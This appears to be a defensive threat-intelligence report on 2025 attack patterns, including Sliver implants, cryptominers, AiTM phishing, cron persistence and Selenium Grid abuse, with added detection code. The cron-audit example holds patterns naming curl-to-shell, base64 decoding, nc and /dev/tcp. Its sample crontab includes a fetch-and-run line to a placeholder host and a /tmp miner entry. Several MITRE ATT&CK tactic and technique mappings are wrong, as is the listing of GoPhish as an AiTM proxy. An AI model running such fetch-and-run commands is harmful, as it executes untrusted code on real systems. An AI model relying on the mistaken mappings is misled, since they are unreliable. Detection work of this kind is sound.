Full Report
Let's break down eight attack patterns security teams should be watching in 2025.
Analysis Summary
# Tool/Technique: Sliver Implant
## Overview
Sliver is a post-exploitation framework and implant observed being deployed rapidly by attackers targeting vulnerable network infrastructure, specifically following the public disclosure of critical vulnerabilities like those in PAN-OS (e.g., CVE-2024-0012, CVE-2024-9474). Its deployment indicates rapid exploitation of edge devices.
## Technical Details
- Type: Malware Implant/Post-Exploitation Framework Component
- Platform: Not explicitly stated, but deployment suggests targeting network appliances/servers (e.g., those running PAN-OS).
- Capabilities: Provides remote access and control as part of an active compromise or post-exploitation phase.
- First Seen: Deployed shortly after CVE-2024-0012 and CVE-2024-9474 disclosures (days after PoCs).
## MITRE ATT&CK Mapping
The deployment of an implant following initial access via RCE (likely exploiting vulnerabilities in PAN-OS) maps broadly to:
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application (As the entry vector via vulnerable PAN-OS)
- **TA0003 - Persistence**
- T1543 - Create or Modify System Process (If the implant establishes persistence)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (Implied control channel for the implant)
## Functionality
### Core Capabilities
- Establishing a persistent or semi-persistent foothold on compromised systems.
- Facilitating command and control (C2) communications.
### Advanced Features
- Rapid deployment immediately following vulnerability disclosure and PoC release, indicating automation or prioritized targeting of vulnerable edge infrastructure.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [Web shells mentioned alongside Sliver deployment]
- Registry Keys: [N/A in context]
- Network Indicators: [C2 structure would be specific to the deployment, none listed]
- Behavioral Indicators: Execution of unknown binaries or scripts on network devices in the window between a patch becoming available and the device actually being patched.
## Associated Threat Actors
- Threat actors exploiting newly disclosed, high-impact vulnerabilities in boundary devices (in this context, actors exploiting PAN-OS CVEs).
## Detection Methods
- **Signature-based detection:** Signatures for known Sliver binaries or configuration files, if available.
- **Behavioral detection:** Monitoring for unusual process activity on network appliances (like firewalls or VPN concentrators) where implants are not expected.
- **YARA rules:** [N/A in context]
## Mitigation Strategies
- **Prevention measures:** Immediately patch publicly disclosed vulnerabilities (like CVE-2024-0012, CVE-2024-9474). Restrict internet exposure for critical infrastructure management interfaces.
- **Hardening recommendations:** Implement strict network segmentation for infrastructure devices. Enforce vulnerability management SLAs prioritizing public-facing/edge assets.
## Related Tools/Techniques
- Other post-exploitation frameworks like Cobalt Strike, Metasploit.
- Web shells (which were observed being deployed alongside Sliver).
---
# Tool/Technique: Cryptominers (via CPU_HU Campaign)
## Overview
Cryptominers were deployed by the **CPU_HU campaign**, which specifically targeted misconfigured PostgreSQL servers. The attackers exploited weak or default credentials to gain access, then used that access to install cryptomining software for resource abuse (cryptojacking).
## Technical Details
- Type: Malware/Payload (Cryptominer)
- Platform: PostgreSQL environments (Linux/Cloud VMs hosting PostgreSQL).
- Capabilities: Unauthorized utilization of system CPU resources for mining cryptocurrency.
- First Seen: N/A (Part of ongoing trends observed in 2024/2025 retrospection).
## MITRE ATT&CK Mapping
The attack chain involves weak credentials leading to execution and resource usage:
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Implied in malware deployment)
- **TA0007 - Discovery**
- T1018 - Remote System Discovery (Implied, locating other services)
- **TA0015 - Impact**
- T1496 - Resource Hijacking (The core goal of cryptojacking)
## Functionality
### Core Capabilities
- Unauthorized execution of mining software.
- Persistent reinfection via startup mechanisms (like cron jobs).
### Advanced Features
- Use of resilient persistence mechanisms, specifically abusing **cron jobs** in Redis and Jenkins environments to ensure cryptominers relaunch upon reboot.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [N/A in context]
- Registry Keys: [N/A in context]
- Network Indicators: Connections to known cryptocurrency mining pools (requires external threat intelligence).
- Behavioral Indicators: Unusually high/sustained CPU utilization on database servers (PostgreSQL, Redis, Jenkins) without legitimate workload traffic.
## Associated Threat Actors
- CPU_HU campaign.
## Detection Methods
- **Signature-based detection:** Signatures for known mining executables (e.g., XMRig).
- **Behavioral detection:** Monitoring high CPU usage from unexpected processes on database servers. Monitoring for attempts to create or modify entries in system schedule jobs (cron jobs).
- **YARA rules:** [N/A in context]
## Mitigation Strategies
- **Prevention measures:** Enforce strong, unique credential policies for all database instances (especially PostgreSQL). Never expose database management interfaces publicly.
- **Hardening recommendations:** Implement Principle of Least Privilege. Regularly audit and disable unused services. Harden container/VM images against persistence mechanisms like cron jobs if they are not required.
## Related Tools/Techniques
- Cryptojacking scripts.
- Abuse of legitimate scheduling functions (cron jobs) for persistence.
---
# Tool/Technique: Phishing (SSO Spoofing & AiTM Proxies)
## Overview
Phishing remains the primary method for identity-based cloud breaches. Two notable techniques observed include:
1. **Credential Harvesting via Spoofed SSO Portals:** Used by actors like **0ktapus** to trick users into submitting credentials via deceptive login pages.
2. **MFA Bypass:** Employed by actors like **Atlas Lion**, using Adversary-in-the-Middle (AiTM) proxies and smishing (SMS phishing) to intercept the authentication flow or walk the user through the MFA prompt in real time.
## Technical Details
- Type: Technique (Social Engineering/Initial Access)
- Platform: User Endpoints, targeting cloud application login portals (SSO).
- Capabilities: Bypassing baseline security controls (including MFA in some cases) to steal valid user credentials.
- First Seen: Ongoing (0ktapus historically active, AiTM phishing on the rise).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.001 - Phishing: Spearphishing Attachment (General category, includes techniques below)
- **TA0006 - Credential Access**
- T1555.005 - Credentials from Web Session Cookie (If AiTM captures session tokens)
- **T1078.004 - Valid Accounts: Cloud Accounts** (The result of successful phishing)
## Functionality
### Core Capabilities
- Deception leading to credential submission (0ktapus).
- Interception of authentication tokens or coercion of MFA approval (Atlas Lion via AiTM/Smishing).
### Advanced Features
- **AiTM Proxies:** Tools capable of proxying the legitimate login session, allowing the attacker to relay MFA prompts in real-time before the session cookie is established or used.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [N/A in context]
- Registry Keys: [N/A in context]
- Network Indicators: User login attempts sourced from anomalous geographic locations or coming *from* the attacker's infrastructure back to the SSO provider (indicative of AiTM relay).
- Behavioral Indicators: Users typing credentials into external, non-corporate domains, or successive, rapid, failed authentication attempts followed by a successful login from a different location/IP (indicating token replay).
## Associated Threat Actors
- 0ktapus
- Atlas Lion
## Detection Methods
- **Signature-based detection:** Detecting known phishing domains used by these campaigns.
- **Behavioral detection:** Monitoring SSO logs for location anomalies (impossible travel) linked to credential submission. Monitoring for the use of AiTM proxies (e.g., GoPhish, Evilginx).
- **YARA rules:** [N/A in context]
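Detection logic for the two behavioral indicators above (impossible travel between successful logins, and a burst of failures followed by a success from a different IP, consistent with AiTM token replay), as an added example that is not part of the original report; the event format, thresholds and sample data are constructed.

```python
"""Impossible-travel and failed-burst-then-success detection over SSO login events.
Added example, not part of the original report; the event tuple format, the
thresholds and the sample events below are all constructed for illustration."""
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

MAX_SPEED_KMH = 1000.0          # implied travel faster than this is "impossible"
FAIL_BURST = 3                  # failures that must precede the success
BURST_WINDOW = timedelta(minutes=5)

# Constructed sample events: (iso_timestamp, user, result, source_ip, lat, lon)
SAMPLE_EVENTS = [
    ("2025-01-10T09:00:00", "alice", "failure", "203.0.113.10", 51.5, -0.1),
    ("2025-01-10T09:00:05", "alice", "failure", "203.0.113.10", 51.5, -0.1),
    ("2025-01-10T09:00:09", "alice", "failure", "203.0.113.10", 51.5, -0.1),
    ("2025-01-10T09:00:40", "alice", "success", "198.51.100.7", 40.7, -74.0),
    ("2025-01-10T08:30:00", "bob", "success", "192.0.2.5", 48.9, 2.3),
    ("2025-01-10T09:10:00", "bob", "success", "192.0.2.9", 35.7, 139.7),
    ("2025-01-10T08:00:00", "carol", "success", "192.0.2.20", 52.5, 13.4),
    ("2025-01-10T10:00:00", "carol", "success", "192.0.2.20", 52.5, 13.4),
]

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two lat/lon points."""
    dlat, dlon = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))

def detect_anomalies(events):
    """Return (rule, user) findings; events are grouped per user and time-ordered."""
    by_user = {}
    for ts, user, result, ip, lat, lon in sorted(events):
        by_user.setdefault(user, []).append((datetime.fromisoformat(ts), result, ip, lat, lon))
    findings = []
    for user, evs in by_user.items():
        ok = [e for e in evs if e[1] == "success"]
        # Rule 1: consecutive successes whose implied speed is physically impossible
        for (t1, _, _, la1, lo1), (t2, _, _, la2, lo2) in zip(ok, ok[1:]):
            hours = (t2 - t1).total_seconds() / 3600
            if hours > 0 and haversine_km(la1, lo1, la2, lo2) / hours > MAX_SPEED_KMH:
                findings.append(("impossible_travel", user))
        # Rule 2: >= FAIL_BURST failures in the window, then success from another IP
        for i, (t, result, ip, _, _) in enumerate(evs):
            if result != "success":
                continue
            recent = [e for e in evs[:i] if e[1] == "failure" and t - e[0] <= BURST_WINDOW]
            if len(recent) >= FAIL_BURST and any(e[2] != ip for e in recent):
                findings.append(("failed_burst_then_success_elsewhere", user))
    return findings
```

In the sample, bob's Paris-to-Tokyo hop in 40 minutes trips rule 1 and alice's three failures from one IP followed by a success from another trips rule 2, while carol's two logins from the same place raise nothing.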
## Mitigation Strategies
- **Prevention measures:** Implement robust MFA (e.g., FIDO2/Hardware keys that resist phishing) over SMS/TOTP where possible. Deploy network controls to block access to known phishing sites.
- **Hardening recommendations:** Conditional Access Policies based on device health, IP reputation, and risk scoring. User training focused on identifying spoofed SSO portals and suspicious smishing attempts.
## Related Tools/Techniques
- Smishing
- Adversary-in-the-Middle (AiTM) proxies (e.g., Evilginx).
---
# Tool/Technique: Persistence via Cron Jobs
## Overview
Attackers are embedding persistence mechanisms early by leveraging legitimate, recurring task schedulers, specifically **cron jobs** on Linux/Unix-like systems. This technique was observed being used to ensure cryptominers remain active even after a system reboot, particularly targeting Redis and Jenkins environments.
## Technical Details
- Type: Technique (Persistence)
- Platform: Linux/Unix-like cloud instances (observed in Redis and Jenkins environments).
- Capabilities: Ensures command execution upon system startup or regular intervals, bypassing process monitoring that might only look at initial execution.
- First Seen: N/A (Standard persistence technique adapted for cloud workloads).
## MITRE ATT&CK Mapping
- **TA0003 - Persistence**
- T1053.003 - Scheduled Task/Job: Cron Job
## Functionality
### Core Capabilities
- Scheduling the execution of payloads (like cryptominers) to run automatically.
### Advanced Features
- Resilience: Cron jobs represent a resilient form of persistence that often lives outside of typical malware droppers or service modifications, sometimes evading basic host monitoring.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [N/A in context]
- Registry Keys: [N/A in context]
- Network Indicators: [N/A in context]
- Behavioral Indicators: Unauthorized creation or modification of crontab files (e.g., `/etc/crontab`, user crontabs, or `/etc/cron.d/` directories).
## Associated Threat Actors
- Attackers deploying cryptominers (CPU_HU campaign mentioned in relation to persistence).
## Detection Methods
- **Signature-based detection:** [Less effective for this technique as it uses native OS functions]
- **Behavioral detection:** File integrity monitoring (FIM) or endpoint detection/response (EDR) alerts on writes to configuration files related to cron jobs or the execution of `/usr/bin/crontab` with unexpected arguments.
- **YARA rules:** [N/A in context]
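An audit of cron configuration that implements the behavioral check above (and the cron-job monitoring recommended for the CPU_HU cryptominers earlier): flag any entry outside an approved baseline and classify it as suspicious when the command matches download-and-execute or obfuscation patterns. Added example, not part of the original report; the baseline, sample crontab and placeholder URL are constructed.

```python
"""Audit cron configuration for entries outside an approved baseline or matching
download-and-execute / obfuscation patterns (the cron persistence described above,
also used by the CPU_HU cryptominers).  Added example, not part of the original
report; the baseline, sample crontab and placeholder URL are constructed."""
import re

# Command patterns typical of malicious cron persistence.
SUSPICIOUS = [
    r"(curl|wget)\b.*\|\s*(ba)?sh",    # fetch a script and pipe it into a shell
    r"base64\s+(-d|--decode)",         # decode an embedded payload
    r"(/tmp|/dev/shm|/var/tmp)/\S+",   # run from a world-writable directory
    r"\bnc\b|\bncat\b|/dev/tcp/",      # reverse-shell style helpers
]

def crontab_line_re(system=False):
    """5 time fields (6 with user in /etc/crontab, /etc/cron.d) or @shortcut, then command."""
    n, user = (6, r"\S+\s+") if system else (5, "")
    return re.compile(r"^(@\w+\s+%s|(\S+\s+){%d})(?P<cmd>.*)$" % (user, n))

def audit_crontab(text, baseline, system=False):
    """Return (lineno, kind, line) for lines not in the exact-match baseline set."""
    line_re, findings = crontab_line_re(system), []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped[0] == "#" or "=" in stripped.split()[0]:
            continue  # blank, comment or VAR=value line
        if stripped in baseline:
            continue
        m = line_re.match(stripped)
        cmd = m.group("cmd").strip() if m else stripped
        reasons = [p for p in SUSPICIOUS if re.search(p, cmd)]
        findings.append((lineno, "suspicious" if reasons else "not_in_baseline", stripped))
    return findings

# Constructed sample: two approved jobs, two attacker-style entries, one unreviewed job.
BASELINE = {
    "0 2 * * * /usr/local/bin/backup.sh",
    "*/5 * * * * /usr/bin/redis-health-check",
}
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/bin/redis-health-check
*/10 * * * * curl -fsSL http://PLACEHOLDER.example/x.sh | sh
@reboot /tmp/.x/miner --config /tmp/.x/c.json
30 4 * * 1 /opt/reports/weekly.sh
"""
```

Run it from FIM or a scheduled job over `/etc/crontab`, `/etc/cron.d/*` (with `system=True`) and each user's crontab, and treat any `suspicious` finding as an alert and any `not_in_baseline` finding as a change to review.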
## Mitigation Strategies
- **Prevention measures:** Strictly limit who can modify system-level scheduling configurations. Use immutable infrastructure principles where possible.
- **Hardening recommendations:** Regularly audit cron job configurations on all cloud workloads for unauthorized entries. Ensure running services (like Redis/Jenkins) are configured with the least necessary privileges to prevent system configuration changes.
## Related Tools/Techniques
- Scheduled Task/Job (Windows equivalent: T1053.005).
- Abuse of service unit files (e.g., systemd units).
---
# Tool/Technique: Abuse of Unauthenticated Selenium Grid
## Overview
Unauthenticated instances of **Selenium Grid** were abused to execute arbitrary payloads via browser automation instructions. This leverages the control plane of the automation framework as an execution vector when proper authentication is missing.
## Technical Details
- Type: Technique (Execution/Lateral Movement)
- Platform: Systems running Selenium Grid instances accessible externally due to lack of authentication.
- Capabilities: Remote code execution or command injection via Selenium's API endpoints when authentication controls are absent.
- First Seen: N/A (Exploitation of configuration errors).
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- T1204.001 - User Execution: Malicious File (If browser interaction leads to file execution)
- **TA0008 - Lateral Movement**
- T1021.001 - Remote Services: Remote Desktop Protocol (If used to interact with a remote desktop via the browser context)
- **T1129 - Execution through Remote Services** (Applicable if the Selenium API is treated as a remote service gateway)
## Functionality
### Core Capabilities
- Leveraging browser automation capabilities (driven by Selenium Grid commands) to execute arbitrary code or deliver payloads on the host running the browser instance controlled by the Grid node.
### Advanced Features
- Exploits common cloud visibility gaps: Many teams monitor web servers but overlook the security posture of dedicated automation/testing infrastructure like Selenium Grid.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [N/A in context]
- Registry Keys: [N/A in context]
- Network Indicators: Connections directed at the Selenium Grid hub/node API ports requesting undocumented or suspicious browser actions.
- Behavioral Indicators: Observed network traffic patterns consistent with automated browser interaction originating from the Selenium Grid nodes that should only be performing non-malicious testing.
## Associated Threat Actors
- General exploitation of misconfigurations.
## Detection Methods
- **Signature-based detection:** [Generally ineffective for configuration abuse]
- **Behavioral detection:** Network flow analysis showing unexpected outbound connections or system calls originating from the Selenium Grid process.
- **YARA rules:** [N/A in context]
## Mitigation Strategies
- **Prevention measures:** Enforce strong authentication for all administrative and API endpoints, including automation frameworks like Selenium Grid.
- **Hardening recommendations:** Run non-trusted automation tasks in highly isolated sandboxed environments (e.g., ephemeral containers that are destroyed after use). Never expose Selenium Grid management interfaces to the public internet.
## Related Tools/Techniques
- Abuse of other testing/automation frameworks (e.g., Jenkins, if unauthenticated).